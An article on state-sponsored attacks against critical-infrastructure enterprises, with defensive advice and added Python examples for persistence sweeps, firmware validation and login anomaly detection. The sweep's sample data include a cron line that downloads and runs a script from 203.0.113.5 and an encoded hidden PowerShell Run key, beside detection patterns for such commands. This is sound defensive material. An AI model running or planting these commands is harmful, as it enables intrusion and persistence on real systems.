By Al Hartmann

State-Sponsored Attacks Against Enterprises

Is My Enterprise Targeted?

According to the 2018 Verizon Data Breach Investigations Report, state-affiliated or nation-state attackers accounted for 14.5% of observed external attack activity. While that is less than a quarter of the organized-crime share, state-sponsored attacks can be devastatingly effective, far reaching, consequential, and stubbornly persistent. The statistics may also understate the problem: criminal attacks tend to be discovered as they are monetized, whereas a state-sponsored intrusion may operate with great stealth, avoid any observable impact, and simply lie in wait as a contingency for a future cyber conflict.

The Department of Homeland Security’s sixteen critical infrastructure sectors double as a target list for state-sponsored attackers. If your enterprise falls into one of these sectors, you are a nation-state target; if it is prominent within its sector, you are a priority target.

  • Chemical Sector
  • Commercial Facilities Sector
  • Communications Sector
  • Critical Manufacturing Sector
  • Dams Sector
  • Defense Industrial Base Sector
  • Emergency Services Sector
  • Energy Sector
  • Financial Services Sector
  • Food and Agriculture Sector
  • Government Facilities Sector
  • Healthcare and Public Health Sector
  • Information Technology Sector
  • Nuclear Reactors, Materials, and Waste Sector
  • Transportation Systems Sector
  • Water and Wastewater Systems Sector

How Are State-Sponsored Attacks Different?

Compared to cybercriminal attacks, state-sponsored attacks differ in objectives, in scope, and in capabilities:

  • In objectives, espionage value and critical infrastructure penetration outweigh monetization (North Korea being the occasional exception).
  • In scope, nation-state attackers strive to extend their footholds very broadly, organizationally and geographically as well as temporally, seeking a permanent, dynamically evolving stealth presence.
  • In capabilities, nation-state attackers possess a potent arsenal: highly skilled cyber teams that can penetrate any cyber defense, signals intelligence teams that can tap any network or surveil any target, supply chain compromise teams that can backdoor enterprise software and hardware (as the Snowden disclosures showed), plus traditional covert methods and the means to turn human intelligence sources within your enterprise.

Keep in mind, too, that some intelligence services cultivate their nation’s cybercriminal organizations, and allegedly even their cybersecurity companies, to advance nation-state objectives, so be alert to this blurring of lines between actors.

What Is the Impact to My Security Strategy?

Targeted enterprises will be under continual attack by multiple state-sponsored agencies, which will likely leave them in a state of continual compromise. That demands strong threat hunting capabilities across the cyber, signals, and human dimensions of attack operations. Like a warship whose watertight compartments let it survive hull breaches without sinking, you must deal resiliently with the attacks that evade your preventive safeguards.

  • Know your environment better than your opponents do: networks, databases, systems, apps, users. This requires always-present, always-on monitoring across all networks, from both endpoint and network vantage points, and across all systems, whether on-prem, in the cloud, or mobile. That situational awareness is imperative for your always-vigilant threat hunters and responders.
  • Develop a strategic data defense plan, including layering, compartmentalization, and segmentation, so that the inevitable penetration events do not result in catastrophic exfiltration of your entire data estate (one hull breach must not sink the ship).
  • Liberally deploy deception lures that appeal to state-sponsored attackers’ espionage motivations and serve as attack tripwires. If the lures are realistic rather than obvious decoys, they let your forensics teams place the attackers under surveillance and study their TTPs using your always-on monitoring.
  • Attack attribution, while not essential, is useful: it lets response teams draw on a threat actor’s historic TTPs, prioritize response actions by characterizing attacker objectives, and identify knowledgeable sources and experienced responders who have dealt with that APT group. Short of full attribution, simply distinguishing and tracking attack groups under your own codenames will be of great value over the long term.
  • As part of continual threat hunting, perform systematic sweeps for attacker persistence mechanisms: autostart registry keys, scheduled tasks and cron jobs, stealthy updaters, and potential deeply embedded phone-home firmware in systems and devices. In a wireless world, radio frequency spectrum sweeps are a worthwhile precaution against out-of-band persistence, a capability well within a state-sponsored attacker’s reach.
  • State-sponsored attackers leverage significant background intelligence and reconnaissance on their targets to craft highly credible phishing lures, target senior staff and executives, and achieve high-value endpoint penetrations. Focus additional security monitoring and security awareness training on these likely targets and other privileged users. Give all staff ready access to safely sandboxed virtual environments for attachment inspection and link validation.
  • Sequester ICS and other OT assets from direct internet connection, and establish strong firewall and gateway protections between your enterprise networks and your ICS networks. Continually re-validate the integrity of all ICS and OT firmware and software images against trusted sources, while remaining alert to supply chain compromise.
  • Establish secure communications channels with mutual authentication and end-to-end encryption for sensitive communications, both internally and with strategic partners and correspondents. Codify transaction workflows so that key authorization and data transfer steps use those channels. Assume insecure channels are open to eavesdropping and message tampering and are effectively transparent to state-sponsored attackers.
  • Adopt user and entity behavior analytics (UEBA) to hunt for and prevent insider attacks and impersonations. State-sponsored attackers can recruit insiders through bribery, persuasion, ideology, blackmail, or coercion (intelligence methods practiced for centuries), or they may simply plant bugs on their persons or in their devices. Outside security, custodial, food service, delivery, or service personnel can also be exploited, and they often have privileged physical access.
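The persistence-sweep bullet above describes the hunt but not the mechanics. The following is an added example, not code from the article or its author, of the core of such a sweep: a fresh autostart inventory is diffed against a known-good baseline, and new or changed entries are flagged when their command line shows traits an analyst would want to see first. The inventory collector itself is assumed (it would read registry Run keys, scheduled tasks, services and crontabs); the heuristics, entry names, paths and the 203.0.113.5 address are constructed for illustration.

```python
"""Persistence sweep: diff a fresh autostart inventory against a known-good baseline.

Added example, not the article's own code. Entries are (location, name, command)
tuples; the collector that would populate them from registry Run keys, scheduled
tasks, services, crontabs and the like is assumed, and the entries below are
constructed sample data (cron lines are labelled by a preceding "# name" comment).
"""
import re
from typing import Dict, Iterable, List, Tuple

Entry = Tuple[str, str, str]  # (location, name, command line)

# Constructed heuristics: traits of a command line that make a new or changed
# autostart entry worth an analyst's immediate attention.
SUSPICIOUS = [
    (r"\\(AppData|Temp|Downloads|Public)\\", "user-writable path"),
    (r"(^|\s)/(tmp|dev/shm|var/tmp)/", "world-writable path"),
    (r"powershell.*\s-(e|enc|encodedcommand)\b", "encoded PowerShell"),
    (r"powershell.*\s-w(indowstyle)?\s+hidden", "hidden window"),
    (r"\b(mshta|regsvr32|rundll32|wscript|cscript|certutil|bitsadmin)\b", "LOLBin"),
    (r"\b(curl|wget)\b.*\|\s*(sh|bash)\b", "download-and-execute"),
]


def classify(command: str) -> List[str]:
    """Return the suspicious traits matched by a command line, in SUSPICIOUS order."""
    return [label for pat, label in SUSPICIOUS if re.search(pat, command, re.IGNORECASE)]


def _key(entry: Entry) -> Tuple[str, str]:
    # Location and name identify an entry; compare case-insensitively because
    # registry paths and task names are case-insensitive on Windows.
    return (entry[0].lower(), entry[1].lower())


def sweep(baseline: Iterable[Entry], current: Iterable[Entry]) -> Dict[str, list]:
    """Compare the current inventory with the baseline.

    added:   (entry, traits)       new autostart entries
    changed: (old, new, traits)    same location/name, different command
    removed: entry                 gone since baseline (a vanished sensor or
                                   service is itself a finding)
    """
    base = {_key(e): e for e in baseline}
    cur = {_key(e): e for e in current}
    findings: Dict[str, list] = {"added": [], "changed": [], "removed": []}
    for k, e in cur.items():
        if k not in base:
            findings["added"].append((e, classify(e[2])))
        elif base[k][2] != e[2]:
            findings["changed"].append((base[k], e, classify(e[2])))
    findings["removed"] = [e for k, e in base.items() if k not in cur]
    return findings


def triage(findings: Dict[str, list]) -> List[str]:
    """Human-readable findings, suspicious additions and changes first."""
    urgent, normal = [], []
    for e, traits in findings["added"]:
        (urgent if traits else normal).append(f"ADDED   {e[0]} / {e[1]}: {e[2]}  {traits}")
    for old, new, traits in findings["changed"]:
        (urgent if traits else normal).append(
            f"CHANGED {new[0]} / {new[1]}: {old[2]!r} -> {new[2]!r}  {traits}")
    for e in findings["removed"]:
        normal.append(f"REMOVED {e[0]} / {e[1]}: {e[2]}")
    return urgent + normal


# Constructed sample inventories (names, paths and the 203.0.113.5 address are illustrative).
BASELINE: List[Entry] = [
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
     r"C:\Windows\System32\SecurityHealthSystray.exe"),
    ("SchedTasks", r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     r"%windir%\system32\defrag.exe -c -h -o -$"),
    ("Services", "Sysmon64", r"C:\Windows\Sysmon64.exe"),
    ("crontab:root", "logrotate", "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf"),
    ("crontab:root", "backup", "30 1 * * * /usr/local/bin/backup.sh"),
]
CURRENT: List[Entry] = [
    BASELINE[0],
    BASELINE[1],
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDriveUpdate",
     "powershell.exe -w hidden -enc SQBFAFgA"),
    BASELINE[3],
    ("crontab:root", "backup", "30 1 * * * curl -s http://203.0.113.5/b.sh | sh"),
    ("crontab:www-data", ".sync", "*/5 * * * * /dev/shm/.x/sync"),
]

if __name__ == "__main__":
    for line in triage(sweep(BASELINE, CURRENT)):
        print(line)
```

Run against the sample data, the sweep reports two suspicious additions (an encoded, hidden-window PowerShell Run key and a cron job living in /dev/shm), one suspicious change (a backup job rewritten into a download-and-execute one-liner) and the disappearance of the Sysmon service. The last is deliberately kept in the report: an attacker who has reached persistence will often remove telemetry, and a baseline diff is one of the few checks that notices an absence.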
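The ICS/OT bullet above calls for continual re-validation of firmware and software images against trusted sources. The following is an added example, not the article's own code, of how that check can be structured so that the manifest itself cannot be quietly edited to bless a backdoored image. It assumes the enterprise keeps a golden manifest of SHA-256 digests built from images obtained through a trusted channel, authenticated with an HMAC key that only the trusted repository holds; where a vendor publishes public-key signatures, those would replace the HMAC. All key material, image names and image bytes are constructed sample data.

```python
"""Re-validate ICS/OT firmware and software images against a trusted manifest.

Added example, not the article's own code. Assumes a golden manifest
(image name -> SHA-256) authenticated with an HMAC key held only by the trusted
repository; keys, image names and image bytes below are constructed.
"""
import hashlib
import hmac
import json
from typing import Dict, Tuple


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def canonical(manifest: Dict[str, str]) -> bytes:
    # Deterministic encoding so the MAC covers exactly one byte string.
    return json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()


def manifest_mac(manifest: Dict[str, str], key: bytes) -> str:
    return hmac.new(key, canonical(manifest), hashlib.sha256).hexdigest()


def manifest_is_authentic(manifest: Dict[str, str], mac: str, key: bytes) -> bool:
    # Constant-time comparison: never compare MACs or digests with ==.
    return hmac.compare_digest(manifest_mac(manifest, key), mac)


def build_manifest(golden_images: Dict[str, bytes], key: bytes) -> Tuple[Dict[str, str], str]:
    """Hash the golden images and authenticate the resulting manifest."""
    manifest = {name: sha256_hex(blob) for name, blob in golden_images.items()}
    return manifest, manifest_mac(manifest, key)


def validate(deployed: Dict[str, bytes], manifest: Dict[str, str],
             mac: str, key: bytes) -> Dict[str, str]:
    """Return a verdict per image: ok / MISMATCH / MISSING / UNLISTED.

    A manifest that fails authentication is rejected outright: an attacker who
    can edit the manifest could otherwise simply "approve" a modified image.
    """
    if not manifest_is_authentic(manifest, mac, key):
        raise ValueError("manifest authentication failed; trust no image until resolved")
    verdict: Dict[str, str] = {}
    for name, digest in manifest.items():
        if name not in deployed:
            verdict[name] = "MISSING"
        elif hmac.compare_digest(sha256_hex(deployed[name]), digest):
            verdict[name] = "ok"
        else:
            verdict[name] = "MISMATCH"
    for name in deployed:
        if name not in manifest:
            verdict[name] = "UNLISTED"  # an image the trusted source never vouched for
    return verdict


# Constructed sample data.
REPO_KEY = b"constructed-demo-key-keep-the-real-one-in-an-hsm"
GOLDEN = {
    "plc-a7-fw-3.2.bin": b"\x7fPLC-A7 firmware 3.2 (golden image, constructed)",
    "hmi-panel-2.0.bin": b"\x7fHMI panel software 2.0 (golden image, constructed)",
    "rtu-s1-fw-1.4.bin": b"\x7fRTU-S1 firmware 1.4 (golden image, constructed)",
}
MANIFEST, MANIFEST_MAC = build_manifest(GOLDEN, REPO_KEY)

# What a sweep pulled off the plant floor: one intact image, one silently
# modified, one missing, plus an image nobody approved.
DEPLOYED = {
    "plc-a7-fw-3.2.bin": GOLDEN["plc-a7-fw-3.2.bin"],
    "hmi-panel-2.0.bin": GOLDEN["hmi-panel-2.0.bin"] + b"\x90\x90",
    "gateway-0.9-beta.bin": b"\x7funapproved gateway build (constructed)",
}

if __name__ == "__main__":
    for name, verdict in sorted(validate(DEPLOYED, MANIFEST, MANIFEST_MAC, REPO_KEY).items()):
        print(f"{verdict:9} {name}")
```

Two design points matter more than the hashing itself. First, the check fails closed: if the manifest does not authenticate, no image is reported as good, because a supply chain adversary who can reach the manifest has already beaten a hash list that is merely stored next to the images. Second, images that are present but absent from the manifest are reported as UNLISTED rather than ignored, since an unapproved build on a controller is exactly the kind of finding a supply chain compromise produces.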
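The deception-lure and UEBA bullets above share one detection idea: learn what normal looks like for each identity, then alert on departures from it, and treat any touch of a decoy identity as a tripwire regardless of baseline. The following is an added example, not code from the article or its author, that runs that logic over constructed authentication log lines. The line format, user names, hosts, addresses and the decoy account name are all constructed; a real deployment would learn its baseline from weeks of identity-provider or domain-controller logs rather than the handful of lines shown.

```python
"""Behavioral baseline over authentication events, with decoy-account tripwires.

Added example, not the article's own code. The log line format, user names,
hosts, addresses and the decoy account are all constructed for illustration.
"""
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, Iterable, List, Optional, Set, Tuple

LINE = re.compile(r"^(\S+) user=(\S+) src=(\S+) host=(\S+) result=(success|failure)$")

# Honeytoken identities: they exist only to be stolen, so any use is an alert.
DECOY_ACCOUNTS = {"svc_backup_admin"}

Event = Tuple[datetime, str, str, str, str]


def parse(line: str) -> Optional[Event]:
    m = LINE.match(line.strip())
    if not m:
        return None
    ts, user, src, host, result = m.groups()
    return datetime.fromisoformat(ts), user, src, host, result


def build_baseline(lines: Iterable[str]) -> Dict[str, Dict[str, Set]]:
    """Per user: hosts, source addresses and hours of day seen in successful logins."""
    base: Dict[str, Dict[str, Set]] = defaultdict(
        lambda: {"hosts": set(), "srcs": set(), "hours": set()})
    for line in lines:
        ev = parse(line)
        if ev and ev[4] == "success":
            ts, user, src, host, _ = ev
            base[user]["hosts"].add(host)
            base[user]["srcs"].add(src)
            base[user]["hours"].add(ts.hour)
    return dict(base)


def off_hours(hour: int, seen_hours: Set[int]) -> bool:
    # One hour of slack either side of the learned working window.
    return not (min(seen_hours) - 1 <= hour <= max(seen_hours) + 1)


def score(lines: Iterable[str],
          baseline: Dict[str, Dict[str, Set]]) -> List[Tuple[str, str, List[str]]]:
    """Return (timestamp, user, reasons) for every event that deserves a hunter's look."""
    alerts = []
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        ts, user, src, host, result = ev
        reasons: List[str] = []
        if user in DECOY_ACCOUNTS:
            reasons.append("decoy account touched")  # even a failed attempt counts
        b = baseline.get(user)
        if b is None:
            if user not in DECOY_ACCOUNTS:
                reasons.append("unknown user")
        else:
            if host not in b["hosts"]:
                reasons.append("new host")
            if src not in b["srcs"]:
                reasons.append("new source")
            if off_hours(ts.hour, b["hours"]):
                reasons.append("off-hours")
        if reasons:
            alerts.append((ts.isoformat(), user, reasons))
    return alerts


# Constructed learning window and constructed events to score.
LEARNING = [
    "2018-06-04T08:02:11 user=jdoe src=10.20.0.15 host=WS-JDOE result=success",
    "2018-06-04T09:15:40 user=jdoe src=10.20.0.15 host=FS-01 result=success",
    "2018-06-05T13:05:02 user=jdoe src=10.20.0.15 host=WS-JDOE result=success",
    "2018-06-06T17:48:19 user=jdoe src=10.20.0.15 host=WS-JDOE result=success",
    "2018-06-06T18:02:00 user=jdoe src=10.20.0.15 host=FS-01 result=failure",
]
NEW_EVENTS = [
    "2018-06-11T08:10:03 user=jdoe src=10.20.0.15 host=WS-JDOE result=success",
    "2018-06-11T03:12:44 user=jdoe src=10.20.0.15 host=FS-01 result=success",
    "2018-06-11T14:00:27 user=jdoe src=10.99.7.3 host=DC-01 result=success",
    "2018-06-11T14:01:09 user=svc_backup_admin src=10.99.7.3 host=DC-01 result=failure",
    "2018-06-11T14:03:55 user=mallory src=10.99.7.3 host=DC-01 result=success",
]

if __name__ == "__main__":
    for when, who, why in score(NEW_EVENTS, build_baseline(LEARNING)):
        print(when, who, ", ".join(why))
```

On the sample events the routine stays silent for the normal morning login, flags the 03:12 file-server access as off-hours, flags the domain-controller login from an unfamiliar address as both a new host and a new source, and raises the decoy tripwire on the failed svc_backup_admin attempt even though that account has no baseline at all. Only successful logins feed the baseline, so an attacker's own failed attempts during reconnaissance cannot teach the model that their source is normal.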